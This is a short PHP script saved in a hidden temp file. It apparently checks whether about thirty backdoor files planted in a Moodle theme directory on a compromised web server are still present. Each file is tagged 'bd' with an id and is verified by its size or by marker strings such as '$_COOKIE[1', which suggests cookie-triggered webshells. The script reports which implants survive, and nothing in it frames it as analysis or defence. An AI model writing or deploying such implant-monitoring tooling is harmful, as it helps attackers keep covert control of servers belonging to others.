File: //tmp/.requests
<?php $r = '/var/www/html/nsa.sumar.com.py'; $x = ["/githash.php"=>"bd@@8713@@dataflow_engine",
"/theme/moove/layout/login.php"=>"bd@@224361@@app_initializer",
"/theme/moove/settings.php"=>"bd@@224362@@$_COOKIE[1",
"/theme/moove/db/upgrade.php"=>"bd@@224363@@59",
"/theme/moove/lang/en/theme_moove.php"=>"bd@@224364@@X-Dns-Prefetch-Control",
"/theme/moove/version.php"=>"bd@@224365@@17",
"/theme/moove/classes/output/renderer.renderer.php"=>"bd@@224366@@1479",
"/theme/moove/lang/en/theme.moove.php"=>"bd@@224367@@382",
"/theme/moove/layout/nggshow.php"=>"bd@@224368@@1038",
"/theme/moove/index_def.php"=>"bd@@224370@@2017",
"/theme/moove/scss/extras/opensearch_desc5.php"=>"bd@@224371@@673",
"/theme/moove/scss/moove/mysqli.class.php"=>"bd@@223746@@744",
"/theme/moove/templates/core/feedcreator.php"=>"bd@@223754@@2018",
"/theme/moove/templates/block_myoverview/mssql.php"=>"bd@@223758@@750",
"/theme/moove/classes/output/core/course.renderer.php"=>"bd@@8976@@610",
"/theme/moove/.github/compiler.assign.php"=>"bd@@223767@@791",
"/theme/moove/lang/xoopsmodule.php"=>"bd@@223771@@1049",
"/theme/moove/classes/output/core_user/myprofile.renderer.php"=>"bd@@9009@@619",
"/theme/moove/layout/mypublic.php"=>"bd@@8755@@system_core",
"/theme/moove/scss/moove/mixins/archive.js.php"=>"bd@@8535@@1065",
"/theme/moove/classes/output/core_course/activity.navigation.php"=>"bd@@9051@@705",
"/theme/moove/classes/privacy/index~.php"=>"bd@@9090@@2050",
"/theme/moove/classes/output/core_course/activity.navigation.php"=>"bd@@223628@@$_COOKIE[5",
"/theme/moove/layout/frontpage.php"=>"bd@@8854@@reverse_searcher",
"/theme/moove/db/services.php"=>"bd@@223647@@reverse_searcher",
"/theme/moove/classes/api/sendnewsletter.php"=>"bd@@9129@@2485",
"/theme/moove/layout/incourse.php"=>"bd@@223658@@64",
"/theme/moove/config.php"=>"bd@@8633@@64",
"/theme/moove/classes/api/sendnewsletter.php"=>"bd@@223713@@approve_request",
"/theme/moove/db/install.php"=>"bd@@8674@@$_COOKIE[-",
"/theme/moove/classes/privacy/index~.php"=>"bd@@223734@@_COOKIE[3]"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');